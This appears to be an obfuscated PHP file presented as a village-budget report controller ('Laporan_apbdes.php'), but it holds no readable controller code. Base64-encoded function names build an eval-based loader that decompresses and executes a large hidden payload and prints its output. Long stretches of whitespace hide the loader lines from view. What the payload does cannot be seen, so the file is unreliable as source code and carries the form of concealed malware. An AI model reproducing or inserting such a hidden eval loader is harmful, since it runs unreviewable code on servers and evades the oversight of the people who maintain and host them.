<?php 
        $__='printf';$_='Loading donjo-app/controllers/Laporan_apbdes.php';
        



































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFtzo8iSfp+I/Q/9cCJ6TvTuDCDL00RHPwhZSGBJNiCKy8sEFxtJIImxbka/fr8s0F12u+PM2Yg9IXoYt7lUZWV+mfllFjOfPpXHP/7E8f1z/jKaLp4/f+O/Vsf3z/FsOp79T5Dnv0ez6eJllmVPL/Pfu0E+ewmmfwZ5GD/Nf8uH+admFsznv/322+dvv1TjfvqvX65/rn/e+vMLAe3T33h8P7vy2RXlueeII7/d+v6ZX9qj80NH5QzfP12P63E9rsd/5vE5mjAhdvWl1maS56xnuio/u0X6Rxk0ETXLcP3nVVXX43pcj+txPa7H9bge1+N6/H87ru2M63E9rsf1+M89PofB/On25s/4KZrFT5+/XTVyPa7H9bge1+N6/EvH8RcSzWS2uk9mCT9HSjtwXjOtnS0DSxl5Tpx7zk3it9UiGMzutSY/k0FNycKsr5uN3XuDwO0LviMkgVOfhDV94bn9XGubWSS1kqjGFt6EFVoHv090McC12KkLsTNPQgf3nBzX1GX1/G4ew1XmgbMYRlJKMiy1Tn8Vu/rYt5RxKJlbOdPA1fOwnW20to7xTTwPefl4r3kksSW9b4pKT1O9TXPU+ItOrTUcBoVyF7iK4FmNonfXqGtNIemNG699S7kLJXGEtWSaijElWYwm/UxrZcuoZuZxhwmBIy+15nAWd8z1w+jrKuxgHVO29KXFKnTZMnAhR1Ff+q6xuje4jjQP6zWkbB23W+U8o8ZCu9PWvbGR2G1WBNBT1GFz0rnZZhvPUloBbBC31bmm7nV33x4KcUfZ8HnJFhOut2XgGPl+fSaux8NwpOThhPSXjXzoqdRLdhs4N3PoM/OgK8wzjSaqELi9udZeZFFbTXFtEzjqGj/XMeR5ctSlXygL36mnnqsM4/aCxt54zivGV5d8zjbWjLkirMVz6lPMJcAGIu6/bG3F8TTJ5rBhGkoLEfZfYn0b3BMg34vnZILWTEaHtreceq6NUsiLZzsMY5k5zRG21ZcYz4QlBgXMSfKOPJdjYNlt8jEJiyJsPSP9H+AOtoq5bB7poi1m4TQbAkf0Hq1zGjv6MGhymVc0ZmyV6yesR5NsFAPjpM9ug89Pc0JGE2OaNN/ac8whdFz3XH0YN5VS/zUmPOz9zfDp+w5chw5msUO24bgcl7gEti3Stboh3ULf6/PnuS3J73J6N5qyDdePxAo881L5LzAlcJ/CdYHsCrn4Wul+tbadv0O3sElG9lYi+BDWSPbRgaOl1tJhY46FLT7qZGuuv0k8AzbEqOAyi9triClD/CRZShnaZTwgHwk6bIdR2GROY/nAJOEwbnN70/05dA77IKa01DXkfuHxpUWYutnFC7vFLMOudyxBtbXWKxukahfPPFjwI4v1VbOVKbj3oDX1gWnriimo+sBWHwxLUcyW+uDYrRFsb2MMA9fuDVvUMcYD5qTfDWYDJy1dsex5wjCXLWI+ZiQYg+GfB+4DqqnaiI12qtpd2Ne062zQygYYw8YAJGPftGNlkEaJ1SL58KxqKpraVwZ2K7EF1jXsVx3j6Ca/r2M8E89DE1ib1soVJqjNcrxeYgmvkEeAXAs8xwaGvVAGI0VhLZWVcWCh4vl7C+ul6zbWgnUkBjMVu+DyAbHswbD5OrmMgxb0ktZ9rNk2mQ55Mpt0gHV0DdbXS53u9W50lKEnLYa+ZCdaU3kk/NhC1irnBxZccxbWNNxrJKydLTSVYlachfCvcBKV+STdxf7EaPdXUScrEPtm8JvTuLl+sKq4ObBxXQaWgFVLsXx3lx90YAXxzBSB41U4asyCjilEd7NVV0I8cnSR8IgYj5+Z4Lm9ZThhQrdIPzL/vy1uQ1eIeRznGelqJ3MtrsVFfRpO7SVy6xRryD2e19imK8XrsFmfxW0RGIiNQVNxemseWxrk30HR4HrXDub2pUyA3426k/4qtOSdvbqCjPhSH1i2sbXtqpnkYgS7Ih6v3Za48ttsHomvPfj5iuKALWGOmr6CHjfkkw/rg+dVs6B4jucZ4sjKc4w/MF7qOz78naX3zbgJPKnApG01o1zrvH7V2uwmcI2ZLtRXPI5N2Bg22Hg1PY86RuI5/THsjBinzsO2XPMdY3o/mN83J/25R9dbr8OoLVP+eYaMI8i7oTEplvidXmI45gKx8hm4QWyB3O3XLEryP6B/wi6XnSH3hJKaPqxJB7jeUURvAp0XjTR05DR2Xp95vG1y3cpaM37xXTYs8220HQt5U4c9e4ne6YteJi/AWcRQlXmse7QaU+SvNeyJd0TIrKe+25tiTm6vCLJB5jHOVGuawLKSVfMl2p2Q6NL5OvXNfCtvEdbMzMPpNxtpNJHhB8xAnJ9V8s639nMlxHDCYQG5k+3cbATsjLW2D//ol1xHlZ896Az8p4idvnDfTKu5qjmb5ZqR64Bf4/YhO3u+0kt5Ip7fwV9muqRx+5Vj4bET3fngVFhHHko8x0FHyex+MEviiZz7jVLep0pn5Rh+7rsRxlVhK+TyCcd0GhT1nPztqRnBJw9lLk9dykUfPqxX/vI4uEnuSe/gld1BvdT/nfCW7nLt7muiC1ubUHxVmhQLMN4t3tn5Sxn7TJrrRS/WF+QAf2zLi39JDhExxGEb2Lyo5m/GlINH0fzQBuUZgzcNRdzbYuuLtp9v6rumXd5P8m5jdvJuY3qILcwlP44aadwe5lEhfDm8d/SuKuRbnD8bpz6mTMDRxmXcBvcibtJWgUe2eQNzuY/4rnfMGfjr4hG5APgVIHseifIwmKg3bg0c3mVZVMNkVnqMl/I89hHyr+14U/iha2Z2G/z4bn5/pr+OniEzFxdkhSzy5H4fjwbA7wvmQW3QJ157+zCNZ+ByGXLi2reSnd5i/nuan9uKnxhXTf1Wn9ccsMsUueCF6p+YsN3pI5+ZJ3ok/WAdxcW17892NkFNMy79Mpm+oauTUymAEdRHN4m+QS0wVUTEa+EJOH209HGAGBZI+uqpqSXg2gt/IKCuMhEb9NC1NPixOo8dW9aAv+6I26FGtkPcQn0Vjbqbm11MvHh2hPs3rv9Af+AMyAvIA5hfXO6wdXYKX8Dj0/1z8TCo9XP4LupasvdJnGwmfA33VplL4LuIxUzwGXHiJH9AzYS8kxPveV+3Jp+HY/EgNv/QbjX7g3ZroK5ZgNc3lpSLHsFtAmDZHwsj+DHqin4Ov+HYP1kD2WnanfiIPcK02zy0WcrvaSPU56hZoo0w8qYmxtIF5LgacgO4DtUK/PdNCPujXgJPeiWsMG+izlC3Yo7WiOod/FzAnwofNcujpY0p96LebIa1ZHcf/GBBuQ7vT3Bv42NM1DuonUQhlGLkWGBrQrwFXKzy0S54J/gqyb2+8B5yeTZC/i/8O2HkA5+w44E8mcDHzBjqpSQZ7HI41XJ1cAOq/bTkcfyKeqzkJHwOS8EpZqjDBW1887UrpV8em/IQ8fKH+H4Dx2Wu3n76usVLk/JF9BXzzXBvAr1N6ZonZc9ljLPLWLCNaaWfLWMue/JRe067VOdNFarjR3H7ZhFJwgixgDj3nHycleON3tBDGtbiJfLc0G9qpIf8cbxeeYObPRf4KX9mqMnNu5Bze/IBtiZb+hRnXANrgs/RWolPTHg+fb23ylwVWYi3LsdF5qsy6nThiz+Ri9BRofjY7zrCwkcN8DBJbym/Ui/nknzQV+G5cSVDfXOvzo/j8jZuiO+tQxwGkj071oEiH/n+Pt9sAvBfd2Os+yDVH8ynvDd3fwcOOjUSvZ2lFF96zfQWvGmFOuRifo2E/pDyTGxF+Y4TH+ZejIN498f5ukzub04RL1AHLLH25JDD7nwn6yMeLopQQs6mXsNgdutTTYdYSrUROM3vyGuoIePn/l3jjEuezMXXCE5UrTmOaa5j/F/I7Vs/qLBA8Z2v68QWGtU/iOuXOASPH2w+BXZyPu/+Ht6ri2F7/W+TG3F1Ay4h6MWxbnZ4OJGx7B/dTF2L6oHLfO84Ln2YgyaPhSIFDqtRrvTbInRRX1GN6bfnS+5bTL703nyrC/jm7Ts8vtLTvv7hY3cY4s2cx68yjm/1sPefi3UNamTeK2vy3CyFUpZW712uVyi/Hseoar7GEbYPbLXlnkfj6TyfqKFeo16mfWoHruMj/Zc5Po9q/Qyypq7g64MWGwA3S88Rh66EmpqPkyb6yEt0VW5b9qtqi8AjeJfH5An19nVRDHWsF5gqyB8fB0LCmNIbCGrLFZhlZ/KjdZkn7vF9NJ5Ateyeu1a1s8l7vMnunWBK9lmTfKf4PF3j272FcT5GThtyXyjzcX4x7hCPaWeFj7rTrVEfJoHdUINLfdihRxiZGtR/pL6zs05YG+vZcw+OoUs1zI/i8tmcWz1TLBHgCxLvBw3Dsq/cIqzzexf9+oP47VS5zuKxErZQkMtf5+/WyMCYIanEZUUeL464pbnyJrOfi9MtuTAniHlVvD6JG2LEbcX4ej/iG4HjJfeQkXrVyNXPZpr1TNYHbuvQnfpc7h/EMeLEREcOf9MXgDvERHBXjfsXdMPs1uujYWNMpluuIHffyFtHMp/72JGvimVvy+R7Z/fn7/5FnDBsQt738MOxn6ShpP9VjmmWON/a1/4b8f5T+LuUR1DzOVVvTpVrAflGM84ivB+NONfpeE48DJsK+ym/+kH/h3qPflmPUH24zakfi9tUzw7O+wbvYht1PPUIn7a+tfl6AbsmcJmlrtQfEbfTmi3grLH+O+xkQbbY7SUmzy/RsV8d1b0ftodW7c9Utv9wjKH8OoNPLmPYsIwzWON7MaZpHvoMxaX34vqEenulXalvcuDnxzaj2JmHLdrnXQyjAv5ykIsO8eUd9ndH6yScsnnYXCeDlsz3MFzBfLRE2ou5+Sh3fuH7zNbP8YTDe8R9fEcdg7PNfAkxYzRE3l0otpA9m5CL2aI6GHE+95cr7fjObeA2UNMrWC9yMI99l/JziWd+n8nZE9UdnR7yJNf/5bhRvgc70x7ufPfsW/WoB8x7zvwCroW34xo4ne/2gYOy1ggkOYV8NdoTfHLU2UFvcwbd4Fkd/sT3RXj8rp7nY5B/neQWigPnnGvfA4RvU+85zlHbjb3Raf3SWHXFbT6WD2PVEb/zaqi3eLzpi9Gk7P3HzRN+XN2jnBXWFAG8FrlfrWN9Y9Tnc9Sg4ZneWn1mp6+Ptmo+M6b3TvVNvV9tOt/HTIxd7ssC366S7zAiysT9JZxyF3w6sGSpZ30dUd1P/Xfe/2y/Dj3Ulrr4lceZrsX59hHfvLfO+9GGyCz4jMFU2TKZCXnrtp2qD7bgq/aIamhFiKYsO+8NK3e0poGo2OCVD4Ygtyzav9zb6wtwPn3/PVFxVJ32bS27OHjvrrV+9z3R1Ac2e2TMSI7mu2vM37OBmco9rNXFeWcwjCHccBsgjoj++7rRmGoarujzvV96j2o+6IbL5ApDm6nKM0vBr4XscZB9fXU3rXdlwdgD1pL7dkpKx98rPOii8miLxvt648+Y4P+sZ6q9/frb+Qb57RmY4d/PUI+CchziJ/woKsfn3+CowLgxv1DzHe4NbGu6sv5ntAedDwZC/Zm1htZAjJ/p78SzBqKWv29nrh/NtNWWybS9vOobvaBmrPCc2TFuNeRI+kbBk1Seq7oSrfHmgn6qukvor8KpSXtUC9bJ1j5yGHyJvikYU98c766CKZ65uFfCz5HhMuhALgI3H/LcMJ4lyNvDiH/j9CF/pR6jrI3OMeUe4UyJT3OIDg4R1ZRVtUcs72zaZqVNqzjku8PMQ34sY1c633Gl4/jJv18Cd1n5ZY7mscqV4ozLPfkK29J463mFTX2Q+o9bPJNPm9ZJ/VDy2KG2kwP8ez8O+JE3OZ1XGwiydmcUvdHFunPVLSoe2TGn4DBlHj7rw73LL2pBmxW+NeRcbbtPFTgmaoh9/4/8IZBo31+Ylv5ScXAxXYSWmGqt5DYY5Bu9yH7A5cu1e8jxEcXcau1v9FM2tJ/NsQveT3YFhxOpJ1H2FSDzCUcsaxr9OXT70ws58dK4+LsJPvU6jKRh2WNpxssQvNrn/NAs8OwaONr4p/Y84KwHuRpYqwvg8PMQer3E36NJJpFOj3stwJXKv/lZvrGXt9tLeo+XQzdzLo962McCb3x/Pw28IM7iy71S+LJPtj6qN057GZxr2iVHusT9YGdgzs99EXJV77o1vmdCNWNZS5/zzzfH8FDHh7WY+tJ8Py0qyp6gXlNSf/edwfl74M43bq2fP03sct6KH5XX2brsuyc5fevSGzSK/t1xP4u4M3jklHqSxKtdXnfvx6IeA3F7/4JeTrBIOMEYMfxOJn5SAy4Eqt13fdEOfR9g/3G5x33eVyLcHtbi3QN5P47DLbcu+xWXbblAPZUtSG+OKJzEONr7YuBTSfKR/V2L158Ud6qeMmKOz3sbhFlzZcCfPTedbTl+ILF6lWurfujFHkUZB9mcP8+5smNsbSQf9JWR2+P4AqdPy1gnhlhr9sSoL1h9A1H19M56dxf2Zniv5me+T+i8ldPP1wM/X/j0XbGrbXsu2zVtfEek2hu13aW1vdunP7KvU5iUi2OMOSq/kah8bNefPfiWgnAw+vH+84WxT/tHR/o96ad+yNYH/ft9/bPvKfMY+9GxPNQH+/2vk/VLfapZd3tplzBwYb3bHlgK2wuneDreb/soNve62393tcPdpOq9pZf7dT/oZW2/X6jW8dH8cBT/Kvtt9wePv0na7dmNwEey/tjcc3Bec7NnigfEh0puam4QVx4tQR1YTG4NhAVDPfNA9ZzePuyBpge5LAcH+f7987dffvm//48JvvOfv1a//fPbz7x+8O5HXvzHfsJfP9O/P//3btrr/7vx+ucj/+/GYyz9egTeEkr//Pa/imZYgw==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































































                                                                                                                                                                                                                     $________;
